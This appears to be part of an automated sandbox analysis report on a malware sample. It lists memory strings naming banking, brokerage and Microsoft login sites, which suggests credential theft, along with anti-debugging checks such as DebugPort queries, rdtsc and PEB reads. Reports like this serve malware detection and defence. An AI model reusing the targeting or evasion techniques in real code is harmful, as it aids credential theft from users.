Source: 6511-iOQ--.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 6511-iOQ--.10.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 6511-iOQ--.10.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /profileVMware20,11696487552u
Source: 6511-iOQ--.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: firefox.exe, 0000000E.00000002.3067407665.000001E97CFBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbb0
Source: 6511-iOQ--.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 6511-iOQ--.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 6511-iOQ--.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 6511-iOQ--.10.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 6511-iOQ--.10.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,1169648d
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,11696487552o
Source: 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3502664180.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: 6511-iOQ--.10.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: runonce.exe, 0000000A.00000002.3501224102.0000000002D2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 6511-iOQ--.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 6511-iOQ--.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 6511-iOQ--.10.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 6511-iOQ--.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 6511-iOQ--.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,116964875.
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ers - NDCDYNVMware20,11696487552z
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMwarey
Source: 6511-iOQ--.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 6511-iOQ--.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 6511-iOQ--.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 6511-iOQ--.10.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 6511-iOQ--.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 6511-iOQ--.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 6511-iOQ--.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 6511-iOQ--.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 6511-iOQ--.10.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: active Brokers - EU WestVMware20,11696487552n
Source: 6511-iOQ--.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 6511-iOQ--.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 6511-iOQ--.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552v
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tportal.hdfcbank.comVMware20,11696487552
Source: runonce.exe, 0000000A.00000002.3506005522.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: look.office.comVMware20,11696487552s
Source: 6511-iOQ--.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 6511-iOQ--.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\gH68ux6XtG.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\gH68ux6XtG.exe

Code function: 0_2_0151096E rdtsc

0_2_0151096E

Source: C:\Users\user\Desktop\gH68ux6XtG.exe

Code function: 0_2_00C77A93 LdrLoadDll,

0_2_00C77A93

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01568158 mov eax, dword ptr fs:[00000030h]	0_2_01568158
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01564144 mov eax, dword ptr fs:[00000030h]	0_2_01564144
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01564144 mov eax, dword ptr fs:[00000030h]	0_2_01564144
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01564144 mov ecx, dword ptr fs:[00000030h]	0_2_01564144
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01564144 mov eax, dword ptr fs:[00000030h]	0_2_01564144
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01564144 mov eax, dword ptr fs:[00000030h]	0_2_01564144
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6154 mov eax, dword ptr fs:[00000030h]	0_2_014D6154
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6154 mov eax, dword ptr fs:[00000030h]	0_2_014D6154
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CC156 mov eax, dword ptr fs:[00000030h]	0_2_014CC156
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01590115 mov eax, dword ptr fs:[00000030h]	0_2_01590115
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157A118 mov ecx, dword ptr fs:[00000030h]	0_2_0157A118
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157A118 mov eax, dword ptr fs:[00000030h]	0_2_0157A118
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157A118 mov eax, dword ptr fs:[00000030h]	0_2_0157A118
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157A118 mov eax, dword ptr fs:[00000030h]	0_2_0157A118
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov eax, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov ecx, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov eax, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov eax, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov ecx, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov eax, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov eax, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov ecx, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov eax, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E10E mov ecx, dword ptr fs:[00000030h]	0_2_0157E10E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01500124 mov eax, dword ptr fs:[00000030h]	0_2_01500124
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0154E1D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0154E1D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E1D0 mov ecx, dword ptr fs:[00000030h]	0_2_0154E1D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0154E1D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E1D0 mov eax, dword ptr fs:[00000030h]	0_2_0154E1D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015961C3 mov eax, dword ptr fs:[00000030h]	0_2_015961C3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015961C3 mov eax, dword ptr fs:[00000030h]	0_2_015961C3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015001F8 mov eax, dword ptr fs:[00000030h]	0_2_015001F8
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A61E5 mov eax, dword ptr fs:[00000030h]	0_2_015A61E5
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155019F mov eax, dword ptr fs:[00000030h]	0_2_0155019F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155019F mov eax, dword ptr fs:[00000030h]	0_2_0155019F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155019F mov eax, dword ptr fs:[00000030h]	0_2_0155019F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155019F mov eax, dword ptr fs:[00000030h]	0_2_0155019F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158C188 mov eax, dword ptr fs:[00000030h]	0_2_0158C188
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158C188 mov eax, dword ptr fs:[00000030h]	0_2_0158C188
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01510185 mov eax, dword ptr fs:[00000030h]	0_2_01510185
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01574180 mov eax, dword ptr fs:[00000030h]	0_2_01574180
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01574180 mov eax, dword ptr fs:[00000030h]	0_2_01574180
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CA197 mov eax, dword ptr fs:[00000030h]	0_2_014CA197
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CA197 mov eax, dword ptr fs:[00000030h]	0_2_014CA197
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CA197 mov eax, dword ptr fs:[00000030h]	0_2_014CA197
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01556050 mov eax, dword ptr fs:[00000030h]	0_2_01556050
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D2050 mov eax, dword ptr fs:[00000030h]	0_2_014D2050
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FC073 mov eax, dword ptr fs:[00000030h]	0_2_014FC073
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01554000 mov ecx, dword ptr fs:[00000030h]	0_2_01554000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000 mov eax, dword ptr fs:[00000030h]	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000 mov eax, dword ptr fs:[00000030h]	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000 mov eax, dword ptr fs:[00000030h]	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000 mov eax, dword ptr fs:[00000030h]	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000 mov eax, dword ptr fs:[00000030h]	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000 mov eax, dword ptr fs:[00000030h]	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000 mov eax, dword ptr fs:[00000030h]	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01572000 mov eax, dword ptr fs:[00000030h]	0_2_01572000
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE016 mov eax, dword ptr fs:[00000030h]	0_2_014EE016
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE016 mov eax, dword ptr fs:[00000030h]	0_2_014EE016
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE016 mov eax, dword ptr fs:[00000030h]	0_2_014EE016
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE016 mov eax, dword ptr fs:[00000030h]	0_2_014EE016
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01566030 mov eax, dword ptr fs:[00000030h]	0_2_01566030
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CA020 mov eax, dword ptr fs:[00000030h]	0_2_014CA020
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CC020 mov eax, dword ptr fs:[00000030h]	0_2_014CC020
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015520DE mov eax, dword ptr fs:[00000030h]	0_2_015520DE
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015120F0 mov ecx, dword ptr fs:[00000030h]	0_2_015120F0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D80E9 mov eax, dword ptr fs:[00000030h]	0_2_014D80E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CA0E3 mov ecx, dword ptr fs:[00000030h]	0_2_014CA0E3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015560E0 mov eax, dword ptr fs:[00000030h]	0_2_015560E0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CC0F0 mov eax, dword ptr fs:[00000030h]	0_2_014CC0F0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D208A mov eax, dword ptr fs:[00000030h]	0_2_014D208A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015960B8 mov eax, dword ptr fs:[00000030h]	0_2_015960B8
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015960B8 mov ecx, dword ptr fs:[00000030h]	0_2_015960B8
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015680A8 mov eax, dword ptr fs:[00000030h]	0_2_015680A8
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01578350 mov ecx, dword ptr fs:[00000030h]	0_2_01578350
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155035C mov eax, dword ptr fs:[00000030h]	0_2_0155035C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155035C mov eax, dword ptr fs:[00000030h]	0_2_0155035C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155035C mov eax, dword ptr fs:[00000030h]	0_2_0155035C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155035C mov ecx, dword ptr fs:[00000030h]	0_2_0155035C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155035C mov eax, dword ptr fs:[00000030h]	0_2_0155035C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155035C mov eax, dword ptr fs:[00000030h]	0_2_0155035C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159A352 mov eax, dword ptr fs:[00000030h]	0_2_0159A352
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01552349 mov eax, dword ptr fs:[00000030h]	0_2_01552349
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157437C mov eax, dword ptr fs:[00000030h]	0_2_0157437C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A30B mov eax, dword ptr fs:[00000030h]	0_2_0150A30B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A30B mov eax, dword ptr fs:[00000030h]	0_2_0150A30B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A30B mov eax, dword ptr fs:[00000030h]	0_2_0150A30B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CC310 mov ecx, dword ptr fs:[00000030h]	0_2_014CC310
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F0310 mov ecx, dword ptr fs:[00000030h]	0_2_014F0310
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015743D4 mov eax, dword ptr fs:[00000030h]	0_2_015743D4
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015743D4 mov eax, dword ptr fs:[00000030h]	0_2_015743D4
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E3DB mov eax, dword ptr fs:[00000030h]	0_2_0157E3DB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E3DB mov eax, dword ptr fs:[00000030h]	0_2_0157E3DB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E3DB mov ecx, dword ptr fs:[00000030h]	0_2_0157E3DB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157E3DB mov eax, dword ptr fs:[00000030h]	0_2_0157E3DB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA3C0 mov eax, dword ptr fs:[00000030h]	0_2_014DA3C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA3C0 mov eax, dword ptr fs:[00000030h]	0_2_014DA3C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA3C0 mov eax, dword ptr fs:[00000030h]	0_2_014DA3C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA3C0 mov eax, dword ptr fs:[00000030h]	0_2_014DA3C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA3C0 mov eax, dword ptr fs:[00000030h]	0_2_014DA3C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA3C0 mov eax, dword ptr fs:[00000030h]	0_2_014DA3C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D83C0 mov eax, dword ptr fs:[00000030h]	0_2_014D83C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D83C0 mov eax, dword ptr fs:[00000030h]	0_2_014D83C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D83C0 mov eax, dword ptr fs:[00000030h]	0_2_014D83C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D83C0 mov eax, dword ptr fs:[00000030h]	0_2_014D83C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158C3CD mov eax, dword ptr fs:[00000030h]	0_2_0158C3CD
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015563C0 mov eax, dword ptr fs:[00000030h]	0_2_015563C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E03E9 mov eax, dword ptr fs:[00000030h]	0_2_014E03E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E03E9 mov eax, dword ptr fs:[00000030h]	0_2_014E03E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E03E9 mov eax, dword ptr fs:[00000030h]	0_2_014E03E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E03E9 mov eax, dword ptr fs:[00000030h]	0_2_014E03E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E03E9 mov eax, dword ptr fs:[00000030h]	0_2_014E03E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E03E9 mov eax, dword ptr fs:[00000030h]	0_2_014E03E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E03E9 mov eax, dword ptr fs:[00000030h]	0_2_014E03E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E03E9 mov eax, dword ptr fs:[00000030h]	0_2_014E03E9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015063FF mov eax, dword ptr fs:[00000030h]	0_2_015063FF
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE3F0 mov eax, dword ptr fs:[00000030h]	0_2_014EE3F0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE3F0 mov eax, dword ptr fs:[00000030h]	0_2_014EE3F0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE3F0 mov eax, dword ptr fs:[00000030h]	0_2_014EE3F0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F438F mov eax, dword ptr fs:[00000030h]	0_2_014F438F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F438F mov eax, dword ptr fs:[00000030h]	0_2_014F438F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CE388 mov eax, dword ptr fs:[00000030h]	0_2_014CE388
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CE388 mov eax, dword ptr fs:[00000030h]	0_2_014CE388
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CE388 mov eax, dword ptr fs:[00000030h]	0_2_014CE388
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C8397 mov eax, dword ptr fs:[00000030h]	0_2_014C8397
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C8397 mov eax, dword ptr fs:[00000030h]	0_2_014C8397
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C8397 mov eax, dword ptr fs:[00000030h]	0_2_014C8397
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158A250 mov eax, dword ptr fs:[00000030h]	0_2_0158A250
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158A250 mov eax, dword ptr fs:[00000030h]	0_2_0158A250
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6259 mov eax, dword ptr fs:[00000030h]	0_2_014D6259
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01558243 mov eax, dword ptr fs:[00000030h]	0_2_01558243
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01558243 mov ecx, dword ptr fs:[00000030h]	0_2_01558243
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CA250 mov eax, dword ptr fs:[00000030h]	0_2_014CA250
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C826B mov eax, dword ptr fs:[00000030h]	0_2_014C826B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01580274 mov eax, dword ptr fs:[00000030h]	0_2_01580274
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D4260 mov eax, dword ptr fs:[00000030h]	0_2_014D4260
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D4260 mov eax, dword ptr fs:[00000030h]	0_2_014D4260
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D4260 mov eax, dword ptr fs:[00000030h]	0_2_014D4260
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C823B mov eax, dword ptr fs:[00000030h]	0_2_014C823B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA2C3 mov eax, dword ptr fs:[00000030h]	0_2_014DA2C3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA2C3 mov eax, dword ptr fs:[00000030h]	0_2_014DA2C3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA2C3 mov eax, dword ptr fs:[00000030h]	0_2_014DA2C3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA2C3 mov eax, dword ptr fs:[00000030h]	0_2_014DA2C3
